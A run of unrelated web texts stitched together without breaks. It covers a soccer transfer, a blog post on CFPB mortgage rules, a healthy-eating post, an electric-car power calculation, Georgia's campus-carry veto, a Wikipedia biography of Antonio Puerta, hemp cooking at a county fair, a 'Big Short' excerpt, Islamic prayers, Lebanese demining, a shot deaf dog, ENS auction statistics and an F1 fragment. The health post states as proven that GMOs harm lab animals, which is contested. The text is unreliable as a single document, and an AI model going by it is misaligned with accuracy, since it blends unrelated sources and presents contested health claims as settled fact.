SOCCEROO Jade North will not be wearing Melbourne Victory colours this season, according to his agent.
The Consadole Sapporo defender was contemplating a return a fortnight ago for family reasons, just before the shock resignation of Danny Allsopp.
With a bit of wiggle room in the salary cap, Victory coach Ange Postecoglou inquired about the 30-year-old.
But it's understood the Socceroos coaching staff, led by coach Holger Osieck, convinced North it was best for his international career to remain in Japan's J-League.
North's agent Buddy Farah confirmed there was Victory interest but said North would remain in Japan.
"No, at this stage I can categorically deny that Jade will return to the A-League," Farah said.
"Yes there was contact (from Victory), but at this present moment he is better off staying in Japan before the Brazil World Cup.
"There is interest in Japan and unless something goes pear-shaped, he will be staying there."
Sapporo are destined for relegation, but North has attracted interest from J-League rivals.
North spent four years with Newcastle Jets and later spent a year with Wellington Pheonix, having played with the likes of Incheon United, Tromso and FC Tokyo.
Originally published as No homecoming for Socceroo North
Of all the provisions of Dodd-Frank conservatives disliked, the Consumer Financial Protection Board may have been the one least liked of all. Its proponent, Elizabeth Warren, ended up in the US Senate when Republicans refused to support her nomination to run the CFPB, perhaps a bit of karma in the long run. Now the CFPB has released its first set of mortgage rules, ostensibly to protect consumers — and conservatives may like what they see, at least conceptually if not organizationally:
The government is establishing new rules for mortgages that will make it harder for some borrowers to qualify but that are designed to prevent the kind of risky lending that nearly caused the housing market to collapse during the financial crisis. The Consumer Financial Protection Bureau on Thursday will roll out the first of several far-reaching changes to the nation's mortgage market, limiting upfront fees and curtailing practices such as interest-only payments that can leave homeowners stuck with unsustainable loans. The agency also will set standards for how much income a consumer must have to obtain a mortgage. This marks the first time the government has spelled out what constitutes a “qualified mortgage,” an effort to prevent the widespread toxic loans that hurt millions of Americans during the housing crisis. Banks that offer qualified mortgages will be protected from lawsuits if they adhere to the criteria. The consumer agency hopes that will drive the entire industry to live by the tighter standards that have taken hold since the crisis, ensuring safer loans but potentially limiting the number of people who can qualify to buy a home. “Credit is going to be restricted, at least a little,” said Cristian deRitis, a senior director at Moody's Analytics. “The debt-to-income cap, for instance, is going to affect some folks at the lower end of the income scale.”
In other words, the government is going to force lenders to stick to rules they liked before the government forced them to stop using them. After all, it was government intervention that created the housing bubble by pressuring lenders into ignoring these criteria — first by force, with the Community Reinvestment Act in the 1990s. Later, when the CRA didn't work quickly enough, Congress created incentives for expanding subprime lending by pushing Fannie Mae and Freddie Mac into buying up massive amounts of questionable loans, making lending a risk-free proposition for paper-sellers like Countrywide Mortgage and others, and then securitizing them in the financial markets as low-risk bonds.
More than once, conservatives questioned this strategy. Even George W. Bush, who liked to take credit for expanded home ownership himself, warned Congress about the risks in 2003 to no avail. The bubble continued to expand until suddenly, the economy slowed — and the false equity in the housing market started to disappear.
Now the government is intervening once again, in order to prevent lenders from doing what the government pressured them to do over a ten-year period, in order to avoid another collapse. This isn't a bad idea, conceptually, but I have a better proposal. Why not just get government out of the lending business and let the people whose capital is at risk decide how to invest it and lend it? Had we done that from the beginning, we never would have have the bubble in the first place.
Fresh Fruit and Vegetables Wiki image
Activist Post
What could be more important than what we put into our bodies? Yeah, yeah that's how all these preachy “health” posts begin. But really, stop and think about what you eat and absorb, and ask yourself on the most basic level if it is fit for a human being.
How many levels of processing is required from the food's raw materials to get it to the form that you call it food? Does it have engineered chemicals designed to glue it together? What do these chemicals do to the human body? Ask why do you eat what you eat? Is it for comfort, convenience, conformity, value, or genuine nutrition?
If we're honest with ourselves, we all have food vices or desires that may push us outside the realm of human food. It's also the nature of our society of unlimited colorful packaging and intense marketing — not to mention the addictive quality of Doritos and Diet Coke.
Then there are genetically engineered crops that replace raw human food substances with laboratory manipulated strains, now proven to have harmful health effects on lab animals. These GMOs are said to already represent around 70% of the average American diet with not much thought about whether they are safe for human consumption.
Indeed, it is an increasingly difficult to eat like a human in our society . . . but it is possible. Clearly, one must want to eat healthier in order to make changes, but that simply entails giving profound thought to the questions outlined above. The fantastic reality is that it is empowering to determine your own diet based on health, and you don't have to make dramatic changes overnight.
Here are simple ways to begin eating more like a human:
Download Your First Issue Free! Do You Want to Learn How to Become Financially Independent, Make a Living Without a Traditional Job & Finally Live Free?
Download Your Free Copy of Counter Markets
1. Cook more with raw materials: Load up on flour, rice and beans, fruits and vegetables, and trusted meat or fish (preferably from local sources). Bake a couple loaves of bread and prepare bulk meals and snacks from these foodstuffs at least once a week. It's easy and makes the week of eating more convenient and healthy.
2. Limit processed foods: Really, who doesn't love Doritos? But when you examine the ingredients, there is a dramatically small amount of human food in them. And the so-called “corn” is genetically modified to begin with. Do your best to limit food purchases to items with minimal processing and chemical additives. Simple organic potato chips usually only have three ingredients, making them a better choice for a treat.
3. Read labels: If you can't pronounce it, it probably was not meant for human consumption. If you use your smart phone to Google many of the chemical additives while in the grocery store you'll find many that should be represented by a skull and crossbones. Part of reading labels is getting more informed about what exactly you're ingesting.
Quote: praisedprod Originally Posted by love this, what kind of power will you get out of it
Man I just typed a huge response to this and then I pressed backspace, and Chrome seeked back in history and all my work was goneAnyway, round 2Power is determined by voltage and amperage in the electric world.The battery pack will consist of 416 cells with 4 cells in parallel and 104 in series. Each cell has a nominal potential difference of 3.3v.Therefore, the voltage of the traction pack = 104 * 3.3V Pack= 343.2vCurrent is determined by both the batteries and the controllers. The batteries are 20ah A123 systems pouch cells that I bought from china. 4 parallel = 80ah units.Each cell has a discharge multiplier of 20-30c, therefore each battery module (8 modules) should put out 1600-2400A.However, my controller has a limit of 2000A, so this is the system bottleneck. It can put out 2000A as long as you can keep it cool (liquid cooling).P = I * VP = 2000 * 343.2P= 686400 w ----> 686.4 Kw1 Kw = 1.341 hp686.4 * 1.341 = 920 hpAssume an 85% drive train efficiency920 * .85 = 782 hpOn top of that, the motors can put out 1500 ft-lbs of torque at 0 rpmSo overall, the car has a potential of 700ish hp. I am assuming I will end up getting anywhere from 550-650 at the wheels.It should be funOnce its done Ive got something to race it against / compare to.Ironically, the car that it shall race was also the vehicle that transported the S2000's motorsCan you guess what it is ? :--)
On Tuesday when Gov. Nathan Deal vetoed the “campus carry” bill, a Fort Valley University freshman was fatally stabbed when he stepped in to help female students being harassed by a man on campus. Two days later, the National Rifle Association used this incident as a rallying cry for allowing guns at colleges.
“The tragic death of this young college student illustrates the point that criminals can strike anywhere, anytime, and do not respect ‘gun-free zones,' ” said Catherine Mortensen, NRA Spokesperson in an email.
In his veto statement, Deal referenced colleges' status as “sanctuaries of learning” and noted a long history of firearms being barred on campuses. Without strong justification to change that, which he said “campus carry” supporters had not provided, he rejected the bill. Georgia's college campuses will mostly remain gun-free zones.
But for how long?
The momentum that pushed the Georgia bill to the brink of enactment remains at the forefront for some leading lawmakers and the strong gun lobby. Nationally, moves in states like Texas and Tennessee, which will both implement some form of campus carry this year, are being closely watched.
Texas' legislation, which goes into effect in August, will allow people with a concealed handgun license to carry their concealed weapon in college and university buildings. Each college and university may determine certain sensitive areas and buildings where concealed weapons will not be allowed. Tennessee's law, which takes effect in July, allows full-time faculty, staff and other employees of public colleges and universities with handgun-carry permits to carry concealed weapons on campus. Guns are not allowed in stadiums or gymnasiums during school-sponsored events or in meetings regarding discipline or tenure.
And as crimes continue to occur on campuses here, so do the calls to allow students and faculty to carry guns.
Ongoing fight
Georgia House Speaker David Ralston told The Atlanta Journal-Constitution this week that the fight here is not over.
“This was a bill that I think is very important. It's fully vetted and debated in the committee process. It was passed by both chambers overwhelmingly,” Ralston said. “This fight will go on. The exact form it takes, it's early to say right now.” The votes were 113 to 59 in the House and 37 to 17 in the Senate.
But, with two years left in office, it is questionable whether Deal would sign any similar campus-carry legislation that comes to his desk, lawmakers say.
“I think after the governor's veto message, it's clear that he lays out the case against weapons on campus,” said State Sen. Elena Parent, D-Chamblee, who became one of the most outspoken campus-carry opponents during past legislative session. “He doesn't say if you had exempted the child-care centers, for example, he would have voted for it … There are several things wrong with it. There is not overwhelming support next year.”
The push for campus carry has a long history in Georgia. Two years ago, the “guns everywhere bill” the Legislature passed would have allowed guns on campus, until the state Senate stripped out that provision. (The bill does allow licensed gun owners to keep guns in their vehicles on campus.)
The powerful University System had been able to beat back repeated campus-carry efforts. But this year, the perfect storm of national developments around the issue and violent campus crimes — including armed robberies at Georgia State and Georgia Tech — seemed too much for even the System to defeat, and the bill was passed.
Then Deal, who has a record of supporting gun owners' rights, vetoed it.
University System Chancellor Hank Huckaby declined to comment for this story. But, Erroll Davis, who has been in Huckaby's position, knows the fight is not over.
“I sense there is a push across the country to go back to the old West where everybody carried a gun,” said Davis, who served five years through June 2011 as chancellor of the state's university system.
“I do not believe it is necessary to carry guns everywhere all the time,” said Davis, a gun owner and hunter, who said he is particularly disturbed when doing common activities like walking into a restaurant and seeing someone with a sidearm having a drink.
At some point, campus carry in some form is likely to pass here, he said. “I don't doubt we'll see a lot of states pass (campus carry laws) before we see many of them being repealed as we did in the Wild West,” Davis said. “We've been here before. We restricted guns for a good reason because we didn't like the outcomes.”
As passed, House Bill 859 would have allowed anyone 21 or older with a license to carry a gun anywhere on a public college or university campus, except for inside dormitories, fraternities and sorority houses, and at athletic events. The bill, sponsored by state Reps. Rick Jasperse (R-Jasper) and Mandi Ballinger (R-Canton), would also have required the guns be concealed.
As part of his veto, Deal requested reports by Aug. 1 from all of the state's public colleges and universities outlining safety measures administrators are taking to keep students, faculty and staff safe.
“This is exactly the reason the National Rifle Association is working so hard to change the laws in Georgia to allow law-abiding gun owners with concealed carry permits to carry on campus,” Mortensen said. “College students should have the same right to defend and protect themselves on-campus as they have off-campus.”
Not to be confused with Antonio Puertas
Puerta and the second or maternal family name is Pérez. This name uses Spanish naming customs : the first or paternal family name isand the second or maternal family name is
Antonio José Puerta Pérez ( Spanish pronunciation: [anˈtonjo ˈpweɾta]; 26 November 1984 – 28 August 2007) was a Spanish footballer who played solely for Sevilla.[1]
Mainly a left midfielder who could also operate as an attacking left back, he died on 28 August 2007 affected with arrhythmogenic right ventricular dysplasia, three days after suffering a series of cardiac arrests during a La Liga game against Getafe on the 25th.[2]
Puerta won five titles with his only club.
Club career [ edit ]
Born in Seville, Andalusia, Puerta joined Sevilla FC as a boy and spent a total of 14 years at the club,[3] growing up at the club's acclaimed youth system alongside other players such as Alejandro Alfaro, Kepa Blanco, Jesús Navas, Sergio Ramos and José Antonio Reyes. His La Liga debut came on 21 March 2004, as he played 71 minutes in a 0–1 home defeat against neighbours Málaga CF.[4]
Definitely promoted to the first squad for the 2005–06 season, Puerta became intimately connected to Sevilla's history on 27 April 2006, when he scored against FC Schalke 04 in the semifinals of the UEFA Cup: in the final moments of the match, he received a long ball and struck it with his left foot for the 1–0 final (and aggregate) win –[5] Sevilla went on to collect five titles in fifteen months, with Puerta scoring his penalty shootout attempt in the 2007 UEFA Cup final, against compatriots RCD Espanyol;[6] his impressive performances earned him international recognition and reported interest from Arsenal, Manchester United and Real Madrid,[7] but all bids were rejected.
Death [ edit ]
On 25 August 2007, Puerta collapsed and lost consciousness in the penalty area due to a cardiac arrest during Sevilla's first La Liga match of the 2007–08 campaign at homeground Sánchez Pizjuán against Getafe CF.[8] He was seen crouching and then subsequently collapsing upon moving back to his team's goal after only 35 minutes of the game had passed,[3] as teammates Ivica Dragutinović and Andrés Palop immediately ran to his side as he lost consciousness; moments later, club medical staff and other players followed suit.[9]
After recovering and being substituted, Puerta was able to walk to the dressing room, where he collapsed once again. He was resuscitated by the doctors and taken, by ambulance, to the intensive care unit of Virgen del Rocío hospital, where he received cardiopulmonary resuscitation.
Puerta died on 28 August 2007, at 14:30.[10][11] Doctor Francisco Murillo reported that he had suffered multiple organ failure and irreversible brain damage as a result of multiple prolonged cardiac arrests due to an incurable, hereditary heart disease known as arrhythmogenic right ventricular dysplasia.[12] There was no official word on whether he had ever been equipped with an implantable cardioverter-defibrillator, an essential precaution in people with the disease; his premature death was similar to those of Marc-Vivien Foé, Matt Gadsby, Miklós Fehér, Renato Curi, Serginho and Phil O'Donnell, all of whom collapsed whilst playing football.
Puerta's girlfriend was expecting their first child at the time of his death.[3] As a mark of respect, players from both Sevilla and city rivals Real Betis attended his funeral days after his death and, subsequently, FIFA ordered the installation of resuscitation rooms in every stadium that hosted the World Cup qualifiers.
Tributes [ edit ]
Sevilla retired Puerta's number 16 jersey after his death
As a result of Puerta's death, Sevilla's UEFA Champions League qualifier against AEK Athens F.C. was postponed until the fourth of September[13]– Sevilla eventually won 4–1. The club also announced that a one-minute silence would be held before every league match on the weekend of 1–2 September 2007.
Additionally, Sevilla's UEFA Super Cup game with A.C. Milan on 31 August went ahead, as a tribute to the player, with all 22 participants having the name 'PUERTA' printed on the back of their jersey. The players and officials on both sides also wore black armbands.[14]
Sevilla subsequently retired Puerta's number 16 shirt, with the provision that should his son, Aitor Antonio (born 22 October 2007),[15] one day play for the club, he will have the option to bring the number out of retirement.[16] However, Spanish football teams were not allowed to do so, as the Royal Spanish Football Federation stated that clubs should use number 1 to 25 for their regular squad, with no additional room for manoeuvre; as a result, David Prieto wore the shirt in 2007–08 in honour of his friend[17] but it was later decided that only youth products could wear that jersey.[18]
Controversially, the number was given to Argentine Federico Fazio in 2016.[19] One year later, it was awarded to Jesús Navas, a close friend of Puerta, upon his return to the club in 2017.[20]
Ramos wore t-shirts in memory of Puerta after Spain won UEFA Euro 2008 and the 2010 FIFA World Cup, with Navas doing the same on the latter occasion.[21] Earlier in 2010, a statue of him was built in the club's José Ramón Cisneros Palacios sporting facilities;[22][23] moreover, Ramos had a tattoo of Star of David on his arm in memory of Puerta since the latter was Jewish.[24]
International career [ edit ]
Puerta was capped once by the Spain national side, playing against Sweden on 7 October 2006: he came on as a substitute for Deportivo de La Coruña's Joan Capdevila in the 52nd minute of a 0–2 away loss for the UEFA Euro 2008 qualifiers.[25]
Additionally, Puerta appeared five times for the under-21s.
Honours [ edit ]
Club [ edit ]
Sevilla
International [ edit ]
Spain U23
See also [ edit ]
Chef Keiko Beatie knows most OC Fair fans come looking to indulge in wacky treats like fried peanut butter meatballs, not to get tips on healthy eating.
But the theme of this year's fair is “farm to table.” And Beatie hoped to advance that idea with her course Friday afternoon, July 21, on cooking vegetarian food infused with an unusual farm-grown ingredient: hemp.
“I wanted to be able to support more of a mainstreamed understanding of how nutritious hemp is,” said Beatie, who touts the protein, omega-3 fatty acids and other nutrients found in the plant. “I just would hope that people would feel more open to learning about it.”
Hemp can't make anyone high. It is a type of cannabis plant, though, with trace amounts of mind-altering THC and generous amounts of CBD, the compound in cannabis thought to have the most medical benefits.
Beatie — a cannabis activist who sits on leadership teams for pro-marijuana groups OC NORML and Women Grow OC — has offered a course on cooking with hemp before at both the OC and San Diego fairs. This year, she blended hemp CBD oil into her strawberry vinaigrette and chocolate pudding for the first time.
This is also the first year that Californians can legally grow hemp — and marijuana — at home thanks to the November passage of Proposition 64. And all types of cannabis soon could be incorporated into the state's 78 annual county fairs. At Riverside and San Bernardino county fairs, both held in desert communities, it's not yet clear what role pot may play.
Starting Jan. 2, fairground operators will — at least theoretically — be able to request state permits allowing visitors 21 and older to buy and consume weed at both fairs and during other private events at the venues, thanks to legislation signed into law in June.
The potential catch is that local cities and counties may be given the authority to veto such events — no small hurdle, since most cities ban all types of marijuana businesses.
On the one hand, given the historic mission of California's county fairs to “advance public knowledge of agriculture,” incorporating cannabis doesn't seem too big of a stretch. It's an increasingly popular crop that's spawned breeding competitions across the country.
Geoff Hinds, CEO of the San Bernardino County Fair in Victorville, notes county fairs have a long tradition of evolving to mirror their local communities.
Fairs in California no longer have tobacco competitions, he pointed out. But fairs do have beer gardens, home brew contests, wine-making competitions and other activities strictly for adults.
“At the same time,” Hinds said, “the fair is a family-friendly event. We're geared toward that market and always will be.”
Hinds said the San Bernardino County Fair board will have to look at the pros and cons on both sides to make a decision for future events.
Kevin Sabet, co-founder of the anti-legalization group Smart Approaches to Marijuana, said it's not surprising the cannabis industry would want to promote their products at county fairs. But he called it “a horrible idea.”
“The marijuana industry won't make rich profits without recruiting future heavy users of their product,” Sabet said. “We should be thinking about reducing their footprint where young people are, not increasing it.”
The Oregon State Fair incorporated cannabis for the first time in 2016. The fair didn't sanction a cultivation competition, but it displayed nine plants that had won an independent growers contest in a greenhouse with extra security and a 21-plus age limit. That display is expected to be back at this year's fair, which opens Aug. 25.
The California Department of Food and Agriculture, which oversees county fairs on state-owned property, is developing policies related to cannabis, according to department spokesman Steve Lyle. He declined to offer further details.
The state's new Bureau of Cannabis Regulation will issue permits for special events featuring cannabis. Bureau spokesman Alex Traverso said they're still determining exactly how those permits will work, including whether local cities will have a say over cannabis-related events on state-owned fairgrounds.
The Orange County Fair board is waiting for those guidelines to be released before beginning detailed discussions about if or how cannabis could be incorporated into future fairs, spokeswoman Terry Moore said.
Officials with county fairs that aren't regulated by the state — such as the Riverside County Fair & National Date Festival and the Los Angeles County Fair — are looking to local leaders for guidance.
The Riverside County fair, held in Indio each February, will be the first to take place after the new cannabis-friendly fair law takes effect Jan. 2. But fair manager Veronica Casper said solicitations for entries for next year's agricultural competitions are already being issued, and cannabis won't be included.
The L.A. County fair would need approval from both the Los Angeles County Board of Supervisors and the city of Pomona to move forward with any marijuana-related events. Given the strict stance those two jurisdictions have taken on cannabis, fair CEO Miguel Santana said, “It's not very likely to be part of the county fair experience anytime soon.”
Three of the most cannabis-friendly event centers in California are fairgrounds.
The Sonoma County fairgrounds in Santa Rosa host the Emerald Cup and High Times NorCal Cannabis Cup festivals, which each attract thousands of enthusiasts looking to check out the cannabis competitions, music acts, vendors and more. Then there's the San Bernardino County fairgrounds, which drew 30,000 people to the recent Chalice festival celebrating cannabis concentrates. And there's the National Orange Show in San Bernardino, which now gets half its business from cannabis events.
It's not yet clear what power local officials may have over the future activities of the fairs.
In the meantime, Moore said the cooking-with-hemp course has never raised any flags either with OC Fair officials or fairgoers.
In addition to Beatie's first class Friday, she'll teach it again at 3 p.m. on Aug. 5. in the OC Promenade building.
She pointed out that hemp seeds are for sale at Trader Joe's and organic hemp oil is on the shelves at Whole Foods.
“This is just a simple plant with amazing nutritional capabilities,” Beatie said.
Excerpt: 'The Big Short'
The Big Short: Inside the Doomsday Machine
By Michael Lewis
Hardcover, 288 pages
W.W. Norton & Co.
List price: $27.95
LANGUAGE ADVISORY: This excerpt contains language some might find offensive.
Chapter One: A Secret Original Story
Eisman entered finance about the time I exited it. He'd grown up in New York City, gone to yeshiva schools, graduated from the University of Pennsylvania magna cum laude, and then with honors from Harvard Law School. In 1991 he was a thirty-year-old corporate lawyer wondering why he ever thought he'd enjoy being a lawyer. "I hated it," he says. "I hated being a lawyer. My parents worked as brokers at Oppenheimer securities. They managed to finagle me a job. It's not pretty but that's what happened."
Oppenheimer was among the last of the old-fashioned Wall Street partnerships and survived on the scraps left behind by Goldman Sachs and Morgan Stanley. It felt less like a corporation than a family business. Lillian and Elliot Eisman had been giving financial advice to individual investors on behalf of Oppenheimer since the early 1960s. (Lillian had created their brokerage business inside of Oppenheimer, and Elliot, who had started out as a criminal attorney, had joined her after being spooked once too often by midlevel Mafia clients.) Beloved and respected by colleagues and clients alike, they could hire whomever they pleased. Before rescuing their son from his legal career they'd installed his old nanny on the Oppenheimer trading floor. On his way to reporting to his mother and father, Eisman passed the woman who had once changed his diapers. Oppenheimer had a nepotism rule, however; if Lillian and Elliot wanted to hire their son, they had to pay his salary for the first year, while others determined if he was worth paying at all.
Eisman's parents, old-fashioned value investors at heart, had always told him that the best way to learn about Wall Street was to work as an equity analyst. He started in equity analysis, working for the people who shaped public opinion about public companies. Oppenheimer employed twenty-five or so analysts, most of whose analysis went ignored by the rest of Wall Street. "The only way to get paid as an analyst at Oppenheimer was being right and making enough noise about it that people noticed it," says Alice Schroeder, who covered insurance companies for Oppenheimer, moved to Morgan Stanley, and eventually wound up being Warren Buffett's official biographer. She added, "There was a counterculture element to Oppenheimer. The people at the big firms were all being paid to be consensus." Eisman turned out to have a special talent for making noise and breaking with consensus opinion. He started as a junior equity analyst, a helpmate, not expected to offer his own opinions. That changed in December 1991, less than a year into the new job. A subprime mortgage lender called Aames Financial went public, and no one at Oppenheimer particularly cared to express an opinion about it. One of Oppenheimer's bankers, who hoped to be hired by Aames, stomped around the research department looking for anyone who knew anything about the mortgage business. "I'm a junior analyst and I'm just trying to figure out which end is up," says Eisman, "but I told him that as a lawyer I'd worked on a deal for The Money Store." He was promptly appointed the lead analyst for Aames Financial. "What I didn't tell him was that my job had been to proofread the documents and that I hadn't understood a word of the fucking things."
Aames Financial, like The Money Store, belonged to a new category of firms extending loans to cash-strapped Americans, known euphemistically as "specialty finance." The category did not include Goldman Sachs or J.P. Morgan but did include many little-known companies involved one way or another in the early 1990s boom in subprime mortgage lending. Aames was the first subprime mortgage lender to go public. The second company for which Eisman was given sole responsibility was called Lomas Financial Corp. Lomas had just emerged from bankruptcy. "I put a sell rating on the thing because it was a piece of shit. I didn't know that you weren't supposed to put sell ratings on companies. I thought there were three boxes — buy, hold, sell — and you could pick the one you thought you should." He was pressured to be a bit more upbeat, but upbeat did not come naturally to Steve Eisman. He could fake upbeat, and sometimes did, but he was happier not bothering. "I could hear him shouting into his phone from down the hall," says a former colleague. "Joyfully engaged in bashing the stocks of the companies he covered. Whatever he's thinking, it comes out of his mouth." Eisman stuck to his sell rating on Lomas Financial, even after the Lomas Financial Corporation announced that investors needn't worry about its financial condition, as it had hedged its market risk. "The single greatest line I ever wrote as an analyst," says Eisman, "was after Lomas said they were hedged." He recited the line from memory: "'The Lomas Financial Corporation is a perfectly hedged financial institution: it loses money in every conceivable interest rate environment.' I enjoyed writing that sentence more than any sentence I ever wrote." A few months after he published that line, the Lomas Financial Corporation returned to bankruptcy.
Eisman quickly established himself as one of the few analysts at Oppenheimer whose opinions might stir the markets. "It was like going back to school for me," he said. "I would learn about an industry and I would go and write a paper about it." Wall Street people came to view him as a genuine character. He dressed half-fastidiously, as if someone had gone to great trouble to buy him nice new clothes but not told him exactly how they should be worn. His short-cropped blond hair looked as if he had cut it himself. The focal point of his soft, expressive, not unkind face was his mouth, mainly because it was usually at least half open, even while he ate. It was as if he feared that he might not be able to express whatever thought had just flitted through his mind quickly enough before the next one came, and so kept the channel perpetually clear. His other features all arranged themselves, almost dutifully, around the incipient thought. It was the opposite of a poker face.
In his dealings with the outside world, a pattern emerged. The growing number of people who worked for Steve Eisman loved him, or were at least amused by him, and appreciated his willingness and ability to part with both his money and his knowledge. "He's a born teacher," says one woman who worked for him. "And he's fiercely protective of women." He identified with the little guy and the underdog without ever exactly being one himself. Important men who might have expected from Eisman some sign of deference or respect, on the other hand, often came away from encounters with him shocked and outraged. "A lot of people don't get Steve," Meredith Whitney had told me, "but the people who get him love him." One of the people who didn't get Steve was the head of a large U.S. brokerage firm, who listened to Eisman explain in front of several dozen investors at lunch why he, the brokerage firm head, didn't understand his own business, then watched him leave in the middle of the lunch and never return. ("I had to go to the bathroom," says Eisman. "I don't know why I never went back.") After the lunch, the guy had announced he'd never again agree to enter any room with Steve Eisman in it. The president of a large Japanese real estate firm was another. He'd sent Eisman his company's financial statements and then followed, with an interpreter, to solicit Eisman's investment. "You don't even own stock in your company," said Eisman, after the typically elaborate Japanese businessman introductions. The interpreter conferred with the CEO.
"In Japan it is not customary for management to own stock," he said at length.
Eisman noted that the guy's financial statements didn't actually disclose any of the really important details about the guy's company; but, rather than simply say that, he lifted the statement in the air, as if disposing of a turd. "This . . . this is toilet paper," he said. "Translate that."
"The Japanese guy takes off his glasses," recalled a witness to the strange encounter. "His lips are quavering. World War Three is about to break out. 'Toy-lay paper? Toy-lay paper?'"
A hedge fund manager who counted Eisman as a friend set out to explain him to me but quit a minute into it — after he'd described Eisman exposing various bigwigs as either liars or idiots — and started to laugh. "He's sort of a prick in a way, but he's smart and honest and fearless."
From The Big Short: Inside the Doomsday Machine by Michael Lewis. Copyright 2010 by Michael Lewis. Reprinted by permission of W. W. Norton & Co. All rights reserved.
It was a book, a blue covered book inscribed with gold letters – our first gift in Iran. This book was to become one of our favorites and several of its lines found their way into my daily prayer. Our new book was The Psalms of Islam written by Ali bin al-husayn, the great grandson of the Prophet of Islam. William Chittick, the translator of this book from the Arabic, introduces it as “…the oldest prayer manual in Islamic sources and one of the most seminal works of Islamic spirituality of the early period.” It also served as one of our texts in our course on Islamic mysticism.
Following are a few lines representing some of the prayers of this book.
“Here am I, addressing myself to the breezes of Thy freshness and tenderness,
having recourse to the rain of Thy generosity and gentleness,
fleeing from Thy displeasure to Thy good pleasure
and from Thee to Thee,
hoping for the best of what is with Thee,
relying upon Thy gifts…” p.498
Appended to these prayers is The Treatise On Rights, also attributed to Ali bin al-husayn. Reference to this Treatise surfaced frequently in conversations with our Iranian scholar friends. Although they understand the individuality aspect of human rights in the modern West, they tend to see human rights in the context of community. Rights are not only seen as my right but as the right of another over me, or in other words, my duty toward another. Freedom then has value, not only as individual freedom to do what I want, but the freedom to choose to follow the way of God and the freedom to choose to serve the community. One of the greatest rights is the right of my body, mind, soul or self over me – to be treated with respect and to realize the intent of the divine.
Some examples from the Treatise are:
“The right of the tongue is that you consider it too noble for obscenity, accustom it to good, refrain from any meddling in which there is nothing to be gained, express kindness to the people, and speak well concerning them.” p.7
“The right of your neighbor is that you guard him when he is absent, honor him when he is present, and aid him when he is wronged. You do not pursue anything of his that is shameful; if you know of any evil from him, you conceal it. If you know that he will accept your counsel, you counsel him in that which is between him and you. You do not forsake him in difficulty, you release him from his stumble, you forgive his sin, and you associate with him generously. And there is no strength save in Allah.” p. 12
“The right of the adversary who has a claim against you is that, if what he claims against you is true, you give witness to it against yourself. You do not wrong him and you give him his full due. If what he claims against you is false, you act with kindness toward him and you show nothing in his affair other than kindness; you do not displease your Lord in his affair. And there is no strength save in Allah.” p. 13.
In Psalm 34 of David we read:
Keep your tongue from evil,
and your lips from speaking deceit.
Depart from evil, and do good;
seek peace, and pursue it. (NRSV)
Indeed, my tongue has a right over me.
After nearly 20 years as a Slovenian diplomat, including a four-year stint as the Permanent Representative of Slovenia to the Council of Europe, Damjan Bergant was approached by his country's Foreign Affairs Ministry to head a comprehensive de-mining project.
plots of land in southern Lebanon are still inaccessible or dangerous due to the presence of landmines – a result of long years of Israeli occupation – but Bergant and his group are making significant progress in changing this.
The UNDP (United Nations Development Programme), NPA(Norwegian People's Aid), and others work under the main coordinating group LMAC (Lebanon Mine Action Center) led by (Director) Imad Odeimi.We've cleared over 1 million square meters of land in south Lebanon in an area that affects 200,000 beneficiaries.
Q: When will Lebanon ever be free of landmines?
Q: What are landmines preventing in Lebanon?
...
Please enable Javascript to watch this video
ALABAMA -- A deaf woman in Alabama is heartbroken after her deaf dog was shot and killed in broad daylight, according to WKRG.
Tabitha Venable lost her hearing when she was just four years old.
When she got her dog, Si, she was simply drawn to him. Si was also deaf.
"They were about to put to him sleep, because he was deaf," Venable said. "And I told her I wanted to see him, and he probably needed a deaf mom. So, we were paired up. He was a beautiful dog. I had to keep him."
Venable taught the dog sign language and a bond began between the two.
But recently everything changed.
"I came home and he was very lethargic," Venable said. "He was just walking, and I looked at him and said, 'are you okay?'"
But Si was not OK -- he was suffering from a gunshot wound.
The Vet attempted emergency surgery, but there was nothing they could do. Si was gone.
Officials belive Si was shot while he was in the yard during the day.
"I don't feel safe," Venable said. "If somebody shot my dog, It could happen to me. I can't hear a gunshot."
Chief Chris McLean, Satsuma Police said, "this is definitely a prime example of an animal cruelty case which is a class C felony. According to the vet, it appeared to be a small caliber wound such as a 22-caliber."
Venable wants justice, but knows this is a loss that cannot be replaced.
"I felt our connection. I feel like I was going to help him, be his mother, because I am deaf and he is deaf too. He was a good dog. He was very protective of me."
State of the ENS: Week 3
Nick Johnson Blocked Unblock Follow May 26, 2017
Another week, and more progress. We're now nearly 40% of the way through the soft launch, and the huge bid we saw in the last update turned out to be only the first of several, with another large bid on consensys.eth, and several significant sized bids since then.
Names and bids
Approximately 136,000 auctions have been started — nearly double the number from week 2 — and there's been 64k bids from 4647 bidders. Most of this uptick appears to be due to a few mass squatting operations starting up; the median account has only two bids, while the busiest 5 accounts account for over 15% of all bids in the system!
46k bids have been revealed — more than double last week's total — and 21.6k names have been registered — more than three times last week's total!
Total ether per day seems stable once we discount the outliers from occasional enormous bids. Let's see if last week's hypothesis about bids-per-day stabilising is correct:
In fact it was not, and the all-time-high on the 16th now looks fairly insignificant compared to recent activity.
When it comes to funds held, the amount locked continues to grow — nearly 50k ether at the time of writing — while the total held in bids is more or less stable after a big jump just after last week's update:
Prices
The odds of getting a domain not in the preimage list for the minimum price remains stable at around 90%, while the odds of getting one on the list has recently increased from its earlier figure of 40% up to a current value of about 65%. I hypothesise this is because of the startup of a couple of bidders scooping up large numbers of names from the list that were otherwise going unbought.
Adoption and ecosystem
I announced proposed improvements to reverse resolution that will make it easier for people to define ‘caller ID' for their addresses.
Aragon announced that they have acquired company.eth, and plan to use it to underpin their system of companies and projects.
imToken released the ‘ENS pro Dapp', making it easier than ever for people to bid on ENS domains on their mobile phones.
Reddit user kainzilla wrote up an excellent guide on buying an ENS name.
MEW released a useful tool for debugging ENS reveals.
Ricmoo proposed a new ENS resolver profile for text records.
I was in the Bitcoin Podcast and Epicenter.
Disappointingly, MEW was outbid for myetherwallet.eth by a squatter, but Taylor took the opportunity to write up an amazing infodump on why they don't care and what their plans for MEW are.
FP1 on Friday and FP3 on Saturday had kicked off at 1pm and 2pm local respectively, while FP2 on Friday, qualifying on Saturday and the race on Sunday all have a 5pm starting time.
And the significant weather change between afternoon and evening sessions was what, according to Raikkonen's teammate Sebastian Vettel, led to Ferrari not getting the maximum out of qualifying.
"We were probably a bit too aggressive trying to anticipate the conditions tonight, got caught out a little bit - it was difficult, it was coming to us towards the end, shame the qualy didn't continue [further]," said Vettel, who had qualified fifth to Raikkonen's fourth.
"There's quite a big shift between afternoon and evening, the sun goes down, the track temperature goes down, I think everybody's trying to do the same thing and I think in that regard we probably went a bit too far."
